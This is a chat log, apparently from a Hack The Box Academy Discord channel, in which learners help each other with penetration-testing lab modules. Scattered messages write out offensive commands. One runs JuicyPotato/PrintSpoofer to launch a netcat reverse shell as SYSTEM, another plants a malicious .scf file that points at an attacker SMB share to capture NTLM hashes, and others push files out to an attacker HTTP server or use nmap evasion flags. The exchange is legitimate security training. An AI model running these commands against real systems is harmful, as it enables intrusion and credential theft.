#modules
Thanks, I'm not the only one this happens to.
yeah the jitters on us 1 2 and 3 are all over ping times are anywhere from 100ms to 1800
i swap between servers
I've tried and it doesn't solve the problem
US1 / Whatever windows box I currently am on - Though I find it to be certain boxes more so than others
ssh yeah see what the difference is for us 2 or 3
both are horrible
eu?
it's a little bit better, but as slow as ever
the real question is, what does htb do?
wot
idk what hero is on or saying exactly but damn my times are high.. tcp us 3
i like tcp for stability but im gonna switch to udp
How can i download katana for kali linux?please help me
hes saying the same you are
Im stuck.
msf returns "exploit complete" but no session is created. I only had to fill one option and it was the RHOST from what I understood through the lecture... help pls.
unless you're using a bind shell, you also need to set the LHOST, make sure that's on the same subnet as the target
trying to upload a file using PS (target host) to py http server on my attack host, but this command isnt working.. method is unsupported.
"Invoke-RestMethod -Uri http://10.10.14.13:8000 -Method Post -InFile C:\Tools\20240325182442_ILFREIGHT.zip -UseDefaultCredentials"
im dumb.. removed "-method" and changed infile to outfile
I find an SMB share is a lot easier.
how do i go about that?
are you rdp'd into windows?
yes
this is the option from my understanding i only had to set RHOST.
also when i try to set LHOST to tun0 the msf fail completly
/drive:drive,/home/name/dir ?
in kali type 'smbserver.py -smb2support share .', and then in windows open explorer and type \\<your tun0 ip>\
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through SPL searches against all data the port that one of the two C2 callback server IPs used to connect to one of the compromised machines. Enter it as your answer.
I need some help for that, what I have done filter the C2 IP, and Compromised Machine IP with some rulename, but none of the port is right
for whatever reason thats preventing me from rdp'ing to the target
your lhost is definitely wrong, also make sure you're using the right exploit
doesnt work, not even typing "python3 smbserver.py" because the file doesnt exist in /home/name/smbserver.py
i can locate the file but its in the impacket dir
locate -i smbserver.py
welp i guess it's impossible to use if it's in another directory
do i have to run it from that that dir?
you can run it from whatever dir you like
hmm.. tried this "python3 /usr/lib/python3/dist-packages/impacket/smbserver.py -smb2support share ." nothing happens after i hit enter and in the target host it cant connect to my attack host
i dont know what to say, works for me.
I use the default on pwnbox. Upon changing the LHOST to tun0 I get a "Handler failed to bind to 10.129.106.194:4444:- -"
When it come to the exploit im using the one provided in the lecture.
i also tried to change the lport to 445 only for it to fail
is 10.129.106.194 your tun0 ip? that looks like the target ip
yooooooo youre right omg feel so stupid right now
need more info than that to help, but smbserver does work. you could just upload to your python http.server with Invoke-WebRequest -Uri "http://10.10.16.2/upload" -Method POST -InFile "C:\path\to\file.txt"
thats how it be sometimes
looks like something was wrong with kali's impacket build.. I can run smbserver now
ill try this too, trying to retain all this info
certutil -urlcache -f "http://10.10.16.2/upload" "C:\path\to\file.txt"
Thank you
there are plenty of ways. smb server is nice because you can just use the gui to cut/paste
what conditions would prevent me from using smbserver? imagine if smb is blocked?
http is probably better, works across both windows and linux, easy to pivot with
no idea. i don't think sysadmins typically block connections to other computers over smb on networks. maybe they would though? would be weird to manage i think.
i struggle with remembering how to use PS to upload
oh there's also scp
would scp work on linux to win?
SCP relies on ssh, so you could if you installed ssh on windows, but you can scp from windows to linux
powershell has ssh built in, but windows isn't running ssh as a service typically
alright right now im rolling with HTTP method with PS. it looks like i grab the file with http.server on my attack host but i dont see it on the directory im in... where is the file going
10.129.230.228 - - [25/Mar/2024 19:20:40] "GET / HTTP/1.1" 200 -
Invoke-WebRequest -Uri http://10.10.14.13:8000 -OutFile C:\Tools\20240325182442_ILFREIGHT.zip -UseDefaultCredentials
nice, use that
that worked like a charm!
gonna have to make a ton of notes here, thanks fellas
Has anyone completed the Session Security: Skills Assessment?
Need some serious help with this..!
I found the admin cookie value but when using it to get to the admin session it gives an error as minilab.htb.net?error=noauth, whereas in the section "Obtaining Session Identifiers without User Interaction" the same method is working
Months back one guy used the same cookie copy and pasting method and it worked
Now it's not. I am really having no idea
You can DM me
Thanks
Anybody available for a question on AD Enumeration and Attacks Skills Assessment 2? I'm trying to figure out if it's a technical problem with the lab or if I'm just not using the correct tool
What's the question?
I've got creds but can't seem to get any remote connection to work with xfreerdp etc
wmiexec or anything
Does evil-winrm work with those creds?
do you get a little [+] showing the creds work with cme? rdp isn't always enabled, but i don't know about that specific box.
It feels odd forcing myself to take the rest of today off after this section I solved, lmao
Back to the grind tomorrow. How were the PrivEsc Modules? I'm looking forward to them 😄
Those creds should work somewhere, more than one box yeah?
I've tried the creds on all the IP addresses I have, thats why I'm wondering if I'm encountering a technical problem or just missing something
so no?
Didn't see your question. I get nothing returned when using crackmap exec, no errors or anything. The command executes and then nothing.
What question you in?
Skills Assessment 2, question 3
Sounds like you're not connected then
or hitting the wrong ip
i've only seen CME not return any results at all if the IP i'm targeting isn't up, wrong ip, or not connected to vpn
That's the weird thing, it does this with all the IPs that I have access to. I've pinged and tested they're all up
xfreerdp should work fine
xfreerdp doesn't connect
and what's the error
brings me to an Xorg sign in screen
so a linux box?
I'm trying to connect from the attack box
Can u show the screen/error you getting?
yeah xfree says the error every time
plus cme not showing results indicates network problem, be it not connected, wrong ip, something like that
Might be a wrong ip
If it was the wrong IP, why would it do it with all 3? That's what I'm wondering
because you have something wrong with the network stuff
you still haven't shown the ip's or errors
show the box's ip address, show the command
pretty simple
i can't think of any other reason cme would not show any data. if you hit a box it can't auth to, it tells you. if you auth to it, it tells you. if it shows nothing, you aren't targeting the right thing or simply can't find a route to that ip.
those are the only 3 things that happen when you use cme, so saying there is no output indicates a network problem of some kind
Can u show the command :3
Waiting for the session to spin up. I terminated and am restarting.
Not sure why it's taking so long to spawn a target
do you have a web proxy on? try refreshing the page
Nope. I'm wondering if it's a HTB network thing. I refreshed the page already
I can't get one to spawn either. Tried US servers and canada
This probably answers my questions. I know the IPs aren't wrong, I've used crackmap exec a thousand times and never got zero response from it before at all, or at least that I can recall
I'll take another shot at it tomorrow, and update ya'll then
Thanks @cloud urchin
Solved
Someone help me with the best command to configure the network settings for my LXC container on my PWbox. I tried this command {sudo lxc-config -n linuxcontainer -s network} but it came out with an error message.... URL : https://academy.hackthebox.com/module/18/section/2097
You better ask this question here in #homelab-sysadm It has nothing to do with the Academy
If you have no access, read and follow #welcome
Please what exactly are you talking about ..
guys pls help me
i am the guy from yesterday
i still cant get the open vpn working pls help
like i successfully connect to the vpn but i am not able to ping /scan the target machines apparently
can i get any help
you should contact support
Need to speak to a person? Learn how to reach our support via HTB Labs.
thank you
im doing the Attacking SAM but my answer is not being accepted for the SAM DB location which is C:\Windows\system32\config\SAM any ideas?
That’s not the location.
read the question very well.
NTLM Relay Attacks- Skill Assessment, Q3: Submit the password of the SQL user 'sqlftp'.
I have pwned BACKUP01, I can see the txt file "sqlftp test.txt". I dumped ldap info about Domain Users and I know about dod, mozah, sqladm etc. I changed the content of the sqlftp test.txt file to:
[Shell]
Command=2
IconFile=\\172.16.119.20\tools\nc.ico
[Taskbar]
I don't get the NTLMv2 hash from any new user. I have the password for sql_ftp_test but I can't log in anywhere. Please help !!!
check what you can access with the creds you have, maybe some shares
Solved ;D
I've been beating my head against the wall trying to figure out wtf is the problem here. What am I doing wrong?
that's not how you use it after you've imported it, read the section again
Some ideas for Windows Privilege Escalation -Further Credential Theft? I found the credentials for sa and tried everything in the module.
But no success and run out of ideas.
Solved. 🙂
hello anyone completed the introduction to c#
because i have a problem with the section libraries, im not able to import libraries
they exist? 😄
yeah
yesterday stopped at SHELLS & PAYLOADS /
Automating Payloads & Delivery with Metasploit
and today i read through the Infiltrating Windows module (havent yet started the questions).
so my question is why do those two modules want you to drop into system shell with "shell" command?
as far as i saw it you dont really have auto complete etc on the system shell, and on meterpreter it worked fine moving through the files/directories. like example:
so isnt it better to just stay at the meterpreter?
sometimes you'll need to use native windows commands, meterpreter won't have those
understandable thanks, is there a way to make the shells more functional? with autocomplete etc? like for example with nc you can just do python3 -c 'import pty; pty.spawn("/bin/bash")' etc?
to upgrade tty
not with msf afaik, you can send a revshell with that if you want
okey yea i meant with msf, okey ty for the help 
Hi guys, I'm currently stuck on Suricata Rule Development Part 2 (Encrypted Traffic) | Working with IDS/IPS, on this question: "There is a file named trickbot.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to a certain variation of the Trickbot malware. Enter the precise string that should be specified in the content keyword of the rule with sid 100299 within the local.rules file so that an alert is triggered as your answer." Any help would be great 🙂
There will be times where you have to actually drop into the system. Msf is just a c2 that organizes your machines and holds pre and post exploits. When you have to do things like chisel or dump sams you’ll need to be in the shell
hey
guys i have question
can anyone help me ??
yea ic ic tyty. jeeez my stupid ass was typing cat C:\flag.txt instead of type and was wondering why nothing came out. since shell didnt work for EB i used the command one 💀 (edited: since i had the same issue as someone else that couldnt drop a shell on the target, even with parameters set correctly. lol)
in the network enumeration with nmap module, in the last section the hard lab, can anyone help me figure it out?
one of the higher ports could be interesting. if you havent scanned it yet rescan for higher
pretty sure you can use cat in meterpreter.
ye i tried using nmap -p- but its taking too long scanning for the higher ports
you need to be evasive with this one.
review the firewall and ids section.
nah it wasnt a meterpreter shell. it was a straight command one
since the shell one didnt work
maybe i was blind and missed something lol
||dns||
If you are in msf you need to do c:\. It will only recognize that as the \ is used for other commands as well
what is that ?
Yeah if you are in a command shell then you need to run command shells you could ideally run the post shell-to-msf
Yea i did but cat didnt work, typed worked as shown in my ss above
. Lesson learned
Because you weren't in a meterpreter session. At that point run the post/shell_to_meterpreter module
that's the hint, go to the section I mentioned and read on the hint and try the commands there.
Which is weird tho because usually with exploits they go straight to meterpreter sessions
can you give me the section name again ?
im doing the Attacking SAM and when im doing the move sam.save \\10.10.15.197\CompData im getting access denied
tnx
im running cmd as admin
Hi guys I’ll need help with starting point, I’m stuck on Appointment in tier1 it’s about using gobuster, I found the wordlist location but there is not such a directory list-2.3-small.txt
Using parrot os
Idk. I mean from what ive seen psec and others should have worked but not sure why my shell didnt get back to me. Thats why i used the command one. Learned a new lesson
Did you@run it through meterpreter
verify your account in #welcome and head to #starting-point
Rhosts and lhosts were all set to the target / tun0
Interesting. I wonder if av was flagging it
I saw some other ppl were having the same issue.
Not sure maybe i was stupid and copied something wrong but i doubt lol
hey
Maybe reseting would have helped
i try to do spoof ip address from the attack box but its not working
can show me some examples for the spoof source ip address ?
hey cant figure it out can you help me
i do everything but i find the highest port 49154 but i dont know what to do
i try --source-port for scanning from this port but nothing showed up
maybe thats not the port you are looking for
run an nmap full tcp scan with that flag.
Hi guys can anyone please help me with that task? Idk the location of the file called small.txt for gobuster. I'm using parrot os. I have checked the SecLists are in /usr/share/wordlists/seclists but I can't find that specific file
that's not a full port scan., -p- is.
okey i will run that see whats happen
.
its taking 54 minutes do you think its okay ??
it takes a while.
so what can i do ??
Type:
locate directory-list-2.3-small.txt
And see if there is a hit
No, when you increase the speed you may miss some ports.
okey
btw, what's the command you are using?
sudo nmap -p- -sT <ip> -Pn -n --disable-arp-ping -v -D RND:5
Doesnt it block without Source port?
@fringe urchin it says locate command not found
something like this
||sudo nmap <IP> -p- --source-port 53 -v||
should provide the relevant section and hints on the flag to get the answer, just straight up providing commands doesn't help anyone imo
can you send me the command in DM ??
it shows a black screen
I have bro.
lmaoo
okey i got taht
Ok before you install it. You just searched for small.txt? Since i think none of those files is called small.txt
lol just gonna delete that in case someone tries it
My computer shut off
read the section and understand what the flags are for, don't expect answers to be provided, it's a skills assessment
That’s what is says in the task, to locate the wordlists and then that file I attached the photo
There is probably one directory between the file and seclist
no crash you try
But just install locate
find / -type f -name 'directory-list-2.3-small.txt' 2>/dev/null
also this is for #starting-point
That’s what I’m looking for
Locate handy tool
After:
Sudo updatedb
Locate the name of the text file
#starting-point <---
https://academy.hackthebox.com/module/67/section/637
Windows Privilege Escalation Skills Assessment - Part I
I got a reverse shell already, now im trying to escalate my privilege to admin or nt authority so I used juicypotato and printspoofer but i failed to get a connection to my netcat listener on localhost.
this error appear everytime i run printspoofer.exe
PS C:\Users\Public\Downloads> .\PrintSpoofer64.exe -c "c:\tools\nc.exe 10.10.14.157 8443 -e cmd"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[-] Operation failed or timed out.
juicypotato should work, did you look at the options?
Call 911
im running cmd as admin can someone give me a hint?
are you trying to transfer the save?
yo so basically in the ffuf module assessment im running this command to try to fuzz for extensions:
$ ffuf -w ./extensions.txt -u http://archive.academy.htb:47671/indexFUZZ
the extensions.txt file is from:
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-extensions-big.txt
am i doing something wrong here?
i only get .php
did you set up the smb share?
am i missing something important? you can also see my command below, if you could give me a nudge on what to do next it would be amazing
this is what i used sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/
you run the extension fuzzing on all the found sub-domains
what??
what?
Did you change the default directory? The default directory in the example of LT Bob, and unless your system is named LT Bob is not going to connect to share.
done, thank you for the help
With the examples, they’re just there to show you how it’s done. You need to cater the example to your own system and make adjustments accordingly. Or else you’ll never be able to connect.
Is there any option to make the machine from Citrix Breakout to run better?
for page 1 windows event logs and finding evil the question are not right the 2nd question i cannot complete
anyone can help me with weak permissions in the windows privilege escalation module?
why does npm init -y not work?
Did you solve it?
are connections to hosts extremely slow in eu-1/2?
hi, EU vpn problems ?
why no results
This isn't the place for that, you already posted in #boxes , what for an answer there
I don't understand where I have to put the vuln parameter for the second task in this module :
https://academy.hackthebox.com/module/58/section/517
|| I know the id=1 is in the cookie but I don't understand where I can put it in the command with sqlmap. I mean, I tried with "cookie", "data" and nothing 😦 ||.
What are you asking specifically?
oh i see your spoiler one sec
it's in the module there, under custom sqlmap requests
I tried these cmds :
- ||sqlmap -r request2 --data="id=1"||
- ||sqlmap -r request2 --cookie="id=1"||
- ||sqlmap -r request2 --cookie="id=1*"||
- ||sqlmap -r request2 --cookie="id=1*" --method GET||
- ||sqlmap -r request2 --cookie="id=1*" --method GET --data='id=1'||
or, you can copy it into the curl command
I did it as well.
DM me the curl command you put into sqlmap
I have the full request...
As a file.
k well dm me the command you used
^
ok, and what was the result
did you get an error or did the command go through successfully
i'm going to need to see the full command like i said.
It's the full commands...
Just using a file, samething.
But if you want :
ok dm me a screenshot of the command if you want my help
if your commands you put in here don't work then you messed something up getting the request
i was able to use the curl method
||curl 'http://94.237.57.59:45757/case3.php' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8' -H 'Accept-Language: fr' -H 'Cache-Control: max-age=0' -H 'Cookie: id=1' -H 'Proxy-Connection: keep-alive' -H 'Sec-GPC: 1' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36'
--insecure ||
your command is missing some flags
???
you're not specifying the cookie
Yeah I know but I thought you were speaking about the curl xd.
in your sqlmap screen shot
did that work for you?
i'm not sure why, i think you copied the request wrong or something
Yeah.
works fine with copying via curl
I was in Burp Suite > copy as file > save to file > named request2
idk i'd have to see a screenshot of the command
you didn't specify the cookie in that last one even though you said you did in the commands
or it could be your process of getting the request i really don't know
i would have to see exactly what you're doing for that
The first, I force cancelling to try with the request file.
Then the second is with the file.
not sure, don't know sqlmap well enough for that. were you able to do it with the copy to curl method?
Hello, help me. I used procdump, I have an lsass.dmp, and I used mimikatz and I got this, plz help me ^^"
CWEE ---> JWT tokens section "Attacking Authentication". I've run the jwtcrack tool and I'm getting no response, it finishes but there is no output
feel like im just really misunderstanding some really simple shit so a nice smack on the head would be nice 🙂
nvm i see they give you a JWT ><
help
Yeah yeah just "copy as curl" but with the file it's easier and easier to read the cmd.
Hello, I have a question regarding AD.
Is the krbtgt msds-supportedencryptiontypes attribute used to select the TGT encryption type?
About SQLMap, is there a risk if we use level 5 or no?
Hi guys, I'm doing the Linux Privilege Escalation Module - LXD. And I have gained root through the container and am looking for the flag.txt file, currently running grep again at the moment. Is there something I am missing? running grep -r -l 'HTB{' /, but idk why when I grep for flag.txt it says it doesn't exist so not trying to waste anymore time searching if I may not be understanding what I should be doing lol
Well the flag might not have the HTB{} and usually the root flag is in the root directory /root
Also did you try to find flag.txt
~ # cd /root
~ # ls -l
total 0
ain't /root the home folder for root
yes
Wtf ^^" ?
You say "grep" but you don't "grep" a filesystem for a filename, you use locate/find
tried both of those
Is the file executable?
shit i must be thinking crooked
yes ^^"
ah yes thanks
im using bin/sh, won't let me use locate
Find is still a command
Also it could be in a hidden directory
So ls -l doesn't show everything
ls -a does
I found it, modified my find command. Thanks, just wanted to make sure I wasn't in the wrong place for some reason or using the wrong shell or whatever lol
can any one help me
No, you're alone, no one can help you
It's always best to at least say what you need help with
any hacker available?
Hi guys, i've been struggling for more than a reasonable amount of time on AD Enumeration & Attacks / Skills Assessment Part I regarding the retrieval of a cleartext password. Would anyone please be able to help ? 🙏
If its something illegal no can do #rules rule 4
its legal, my account was hacked
and my server also
🥺
Then contact discord support
Nothing we can do for you my dude
ive sent 100+ mails
If you got hacked there's a nonzero chance you downloaded and ran something you weren't supposed to
Just an example:
Your acc got hacked since you probably downloaded something and there was a discord token stealer in it, boom your acc gone. We cant magically just hack your account lol
idk
Well then you just gotta wait and be patient, sending more emails doesn't make them respond faster
In fact, as someone that's worked IT, it's just annoying
It's a process: support gets your message -> an agent/team gets assigned to investigate -> they reach out to provide more info to ensure you are the owner of the account
this is my alt acc
why
Uninstall anything you may have installed recently
Because
- it's illegal
- it's illegal
Reading the #welcome channel can help you find that out
If you can't be bothered to read: leave
can i learn this
But this boils down to: you downloaded something, likely a "cracked" software that ran a token stealer
Which bypasses any login stuff
Meaning even if you had 2fa, it doesn't matter
Not in a day
And if you wanna hack discord, be prepared for the police to knock at your door
It wont teach you how to hack someone's discord tho
Nope
lol
There's no course within HTB that will teach you how to specifically hack discord
Or any other social media
Because, to circle back, that's illegal
anyone ? 😦
👋
You need to do some cracking
Its not gonna be a directly plaintext password
according to what can be found on htb forum it should be readable directly in plaintext using the right options in mimikatz. I think i tried them all without success. I finally (like 2mins ago) was able to see the cleartext password in a weird kinda memory dump in Lazagne output but I would love to know how to get it via mimikatz
I think I did lsadump with mimikatz ¯\_(ツ)_/¯
yep i tried it as well, but nothing at all regarding the targeted user..
plenty of ways but I don't recall it being in plaintext ¯\_(ツ)_/¯
I remember needing to do some cracking however
Anyone regarding my question please?
Seems like it, you can likely Google it though
Your question got drowned out as it didn't seem related to a module, and other people were getting assisted
TGT encryption type – As mentioned before, a TGT is only read by domain controllers in the issuing domain. As a result, the encryption type of the TGT only needs to be supported by the domain controllers. Once your domain functional level (DFL) is 2008 or higher, your KRBTGT account will always default to AES encryption. For all other account types (user and computer) the selected encryption type is determined by the msDS-SupportedEncryptionTypes attribute on the account. You can modify the attribute directly or you can enable AES using the checkboxes in the Account tab.
@next bronze I read it but I did not understand it because at one point it says the user account attribute is used and at another point it refers to the krbtgt account
The msDS-SupportedEncryptionTypes attribute uses a single HEX value to define which encryption types are supported.
this means it contains a value that tells you what is supported, not what is selected
I understand that for TGS the user account is used but I'm not sure for the TGT
@cloud urchin yes, that I know but my question is related specifically to the encrytion algorithm for the TGT
your question was that attribute dictating the encryption type
the answer is no, it tells you what's supported
you literally said it right here
"Is the krbtgt msds-supportedencryptiontypes attribute used to select the TGT encryption type?" the answer is no.
But in the same document it says that if I want to restrict what encryption algorithms are supported I change the attribute of the krbtgt account and then restart the controller
Yeah thats not a contradiction
Its literally a switch that says "support these encryption types"
The encryption selected is based on several factors, it's a result of the negotiation process between the client and the KDC, considering their capabilities, the ticket policy settings, and other config settings... it picks the strongest one between them all
look at it this way, your car has 4 seats and can support 4 people. does that mean your car dictates how many people are going to be in it?
no it just means that's how many people you can fit in there
So the supported encryption types is based on the krbtgt attributes and the user account attribute?
No..
supported encryption type simply means it can use those particular encryptions
^
If I want to know what encryption types are supported for a user account for the TGT, what attribute is relevant?
My english is not good sorry
supportedEncryptionTypes...
Ok, of the user's account or of the krbtgt account?
Of the tgt account
Tgt says: this is what I support
And user says "OK, I'll encrypt the strongest of these options"
@fathom pendant, ok, that's what I understood, that for the TGT it's based on the krbtgt account and for the TGS it's based on the user's account properties.
Is that correct?
no
you need to understand the supportedEncryptionTypes attribute is associated with the KDC, the key distribution center. the KDC is responsible for issuing BOTH the TGS and TGT tickets for services.
you should take the kerberos course you'd love it lol
Yes, for the TGS the encryption key is based on the user's password and the available encryption type for the TGS is based on the account properties or the default properties set on the domain controller.
The KDC dictates what can/can't be used in encryption, and sets those rules for the TGT/TGS
if it was based on the user's choice that'd be a huge security problem
KDC sets the value which gets passed to their respective parts
@cloud urchin I didn't say it was based on the user's choice but for the TGS the supported encryption types are set on the user's account stored on the domain controller.
I'm setting an environment now to do some tests
@fathom pendant the KDC select from the list of supported algorithms provided by the client.
I thought the article is pretty clear 
@next bronze probably but my english is weak, so most parts were clear, the part about the TGT wasn't.
Sorry for the disturbance
Were you able to get this resolved? I'm having the same issues.
Not sure why neither of these result in a reverse shell 😦
||
PS C:\tmp> .\JuicyPotato.exe -l 1337 -c "{90F18417-F0F1-484E-9D3C-59DCEEE5DBD8}" -p C:\windows\system32\cmd.exe -a "/c c:\ProgramData\nc.exe <IP> <PORT> -e cmd.exe" -t *
Testing {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8} 1337
......
[+] authresult 0
{90F18417-F0F1-484E-9D3C-59DCEEE5DBD8};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
||
||
PS C:\tmp> ./PrintSpooler.exe -c "c:\tmp\nc.exe <IP> <PORT> -e cmd"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[-] Operation failed or timed out.
||
Update: ||Kept trying lots of different CLSIDs from the list and eventually one worked, though there was no difference in the output of running the command 🤷 ||
Yeah try playing with clsid read the github repo of juicy potato
Oh really? That's the response for an incorrect CLSID? I was getting errors before 🤔
Sent you a dm saw your command there is lot of issue
ICMP Tunneling with SOCKS
Several issues with this module: -- I will name the most prevalent --
- Issues with the vm fully loading
- ssh keeps kicking me out
- Issues getting the ptunnel-ng running properly from my own vm - The issue of a missing module so the ptunnel won't run unless I compile it from the HTB vm. Found this out during research
- Used the HTB vm and I keep getting kicked out of the ssh session. My commands are correct.
- Does anyone have a workaround suggestion for this problem?
Got it working for a sec and then it dropped the rgp window again - this is after a few resets - not stable
Could I get some help with "Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer."
https://academy.hackthebox.com/module/147/section/1322
I have the password for Kira, but I cant use it to log into anything but smb with an empty share
Currently im trying to crack SSH with a mutated password list of Kiras password, but this seems like a too roundabout (and lengthy) way of doing things
So im probably not approaching it right
DM me or TAG me here please!
@fathom prairie Check one of the mutated lists you created from a previous module 🙂
I deleted all of them because I thought I wouldn't need them anymore
which one are you talking about?
A good place to start would be to check the module regarding "Password mutations"
I'm doing the Footprinting module (Section: FTP). I'm stuck on the second question. Could someone provide a hint/advice?
Enumerate the FTP server and find the flag.txt file. Submit the contents of it as the answer. I don't have the password or creds to login to ftp..
Sometimes poor configurations allow for guests to connect without credentials.
I tried with anonymous without password, but they asked for root
If it's asking for root's password, that means you're logging in as root
Okay I've remade the mutated password list
But what do I do with this?
I thought Kira's password was assumed to be some variation of Loveyou1
I would review the section in the module about downloading all available files
hmm, curious, the anonymous login doesn't work for login but works for file dl..
Try ftp anonymous@ip
That pw variation is in the large mutated list, she does reuse her password across many services
omg finally got that CORS misconfiguration question
Was it something goofy?
the linux ptt section makes my head hurt
It's fun
Nah just a little tricky because one part wasn't explained about writing the exploit
Just... using tools makes it faster to find
Ahhh
So lots of digging and throwing shit at it
yeah i could not figure out why my code didn't work.. i took a closer look and figured it out though. ofc. lol.
that's how they get you here
So the password I'm supposed to use to log into Kira is in the large mutated list?
Also, then do I try to use that to crack FTP and then reuse that password for SSH to continue with this lesson?
then it goes into port forwarding
the hint says what she's used as a password. why don't you try to use that somehow
I think we are confused...
no i did that section
I already did the mutated password lesson, and I already found out her password using a mutated version of that hint
okay
I'm talking about this one: "Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer."
oh
The password I found during the mutated password lesson doesn't work for this part
Indeed
you'll have to find a different one then
So I'm like... How do I do this
look for hashes somewhere
That password for that section specifically is for a different user
Oh so it's for a different Kira?
I'll try that
I believe you also find her password for the credential hunting in linux section to get to will
"Kira", who in most cases had SSH access to other systems with the password "LoveYou1"
This part?
im so lost my guy
Yes, the password you used to log in there is the one you use
I found the right password for that using SMB crackmapexec, but it doesn't work here
Take this as a lesson to always save creds you find
Unless the SMB one is the wrong one and it's different
To be clear, I'm supposed to use SSH to log in, right?
What is the error you get with ssh
Is it wrong password or blah blah blah (publickey)
Then the password you have for her is wrong
Her password is a variation of LoveYou1
The password I have for her I got from the section with Credential Hunting
I got it off SMB
I have a variation of LoveYou1
I'll send it as a spoiler then delete it, so LMK when you check it
did you crack the id_rsa?
WHO DOES THAT
wrong person sorry
why you trying to ssh without id_rsa?
I assumed that's what it meant by log into the host
Delete that btw
the pw you found should be a passphrase to enter when using the cracked id_rsa not the kira pw
👍
What's the command you're using?
Gimme a sec though while I sanity check
i figured it out
kk
Huh... Then how do I log into the host
he wanted to be funny
ssh {username}@{IP} -i id_rsa ?
Because it's a domain joined linux host
imma just start taking htb literally on everything they say
They don't have the rsa key
OHHHHHHHHHHHHH
Ya dingbat they're trying to log in to grab it
But I don't have the id_rsa
i knew that
It says log into the host and then crack the id_rsa
^
My head is spinning, I'm gonna faint
You should be able to log into ftp
my bad didn't read the question well
Note things may appear hidden at first
Ok give me one second, maybe the SMB crackmap is a false positive
I mean her password for logging in is the same from the earlier section
The problem is that I took a week break
So I forgot all the passwords and I didn't save them ;~;
Yes.. A very time consuming lesson
but you won't make the mistake again ¯\_(ツ)_/¯
It can
It's reading a list fine?
It's showing the not-positive results
oops
All the results aren't positive
But what's with the NoneType object
So FTP is a no go?
It can be a go
Literally all It's telling you is it didn't auth with those creds, so that combo isn't good
Those aren't errors
Wasn't the password a mutation of LoveYou1 though
Yes
The list I put it in is a mutation of LoveYou1 using the custom rule they gave
You're attacking a linux device: casing is important
Same result for Kira and kira
Weird
can you tell me where you found the Kira password? In what section exactly, so I can try to redo the question
I don't remember where I found it, that's the main problem
I did some sections about a week ago and then took a break
and then I came back to see it asking to use the credentials
but I forgot them
The og password was found in the credential hunting linux section
But it was never the answer to a question
You can also use hydra
What was the syntax for that?
-t 48 is the most stable
hydra -l username -P list service://ip -t <threads>
🙏
Btw each module has a cheat sheet you can reference for command syntax
Right forgot about that
Hydra got me a different password than crackmap
Oh lord thank you
I can finally continue my journey after ten long years
Does crackmap have a problem with or something
No
It was the same password as crackmap except they were missing that at the end
It's likely after a bit that the ftp server was just overloaded
oh
So it just auto-rejected everything thrown at it, correct or not
Also it looks like smb is a "trap" as it accepts any username/password combo so it'll just spit out a positive no matter what
Having some difficulties with this one. I've already examined the local.rules file, reviewed its content, and explored Wireshark. However, I'm still struggling to pinpoint the XX Byte Value I'm supposed to be looking for... Not sure where to go from here
Working with IDS/IPS > Skills Assessment - Snort
There is a file named wannamine.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to the Overpass-the-hash technique which involves Kerberos encryption type downgrading. Replace XX with the appropriate value in the last content keyword of the rule with sid XXXXXXX within the local.rules file so that an alert is triggered as your answer.
am I supposed to read this via command, or will the output stay the same if I download it?
i connected with smbclient \\DC01\julio\ -k and the flag isn't taking
i used the get command tho
if you do dir is the flag in that directory?
oh my fucking god
"flag isn't taking" also isn't descriptive
are you in a directory you can write to?
IM SO DONE
Take a look at the article in the reading to get an idea of what to look for. Essentially you want to look at Kerberos packets, and find a pattern resembling the pattern you see in the rule
LITERAL 2 HEAD MOMENT
anyone did this in the malware analysis module?
whenever I change the instruction and run, it keeps changing back to the original
OKAY this section was fun ngl
seeing what i could do with some simple hashes and such.
still cant believe i 2headed that flag
did you save after changing the instructions?
at least that's my initial thought ¯\_(ツ)_/¯
do i have to? how
Is anyone else's vm not spawning
i mean if you have to do any code editing
it won't update unless you save, even in a debugger you have to save before your run it
hmm lemme try, I don't remember seeing a save option
idk, there is no option to save
i guess i have to set breakpoints before it and change all of it every time :(
doing this with HTB's laggy RDP is just pure pain
Got it now, Thanks! I just need to calm down going through these modules. I just like to jump right into things lol
wtf, it's just so confusing, I saved into a different file and it's back to the original still
Working on AD Enumeration & Attacks - Skills Assessment Part I. Can the answer to question 2 be found using the webshell or am I missing something in my enumeration step? I tried importing PowerShell modules and didn't have any luck so far.
dns is not working :(
you might want to get a REMnux VM
nah wait i'm bad this is for the debugging part isn't it
i mean.. maybe it works? did you try capturing connections with inetsim?
it is not listening, I saw using netstat
im gonna try with pwnbox
what hurts more than a breakup is clicking and waiting for a response on screen on this shitty RDP
it looks like it's working; it's just telling you the method is now deprecated, as it's giving you a PID
unless i'm just missing something
no, I checked netstat, all others were there except DNS
Was about to say I see a pid
so the PID isn't there?
also are you sure you're not meant to launch this on the target machine?
or is this just part of the steps
i haven't done this module so idk
i see this in my nightmares now
just curious what returns when you do netstat -nap |grep :53
i applied all patches, still it reached "sandbox detected"
at this rate imma just get the malware on my pc and let it destroy it
and to confirm, you did edit the inetsim config?
hey, is there a way to diff two same-looking source code files, strings etc. like this in VS Code?
same same
Hey, what's up guys, I'm new. I have a question: I signed up for HTB Academy and I have cubes, but I can't unlock any of the modules. Anyone had that issue before?
trying to troubleshoot this
how many cubes do you have?
Right mouse click on file and click on "select for compare". Right mouse click on other file and click on "compare with selected"
yeah but it's very ugly with no color
i have color in mine....... your theme is lame?
i was doing it wrong, now it's showing color, thx
can someone help me with the flag in Exploiting Web Vulnerabilities in Thick-Client Applications?
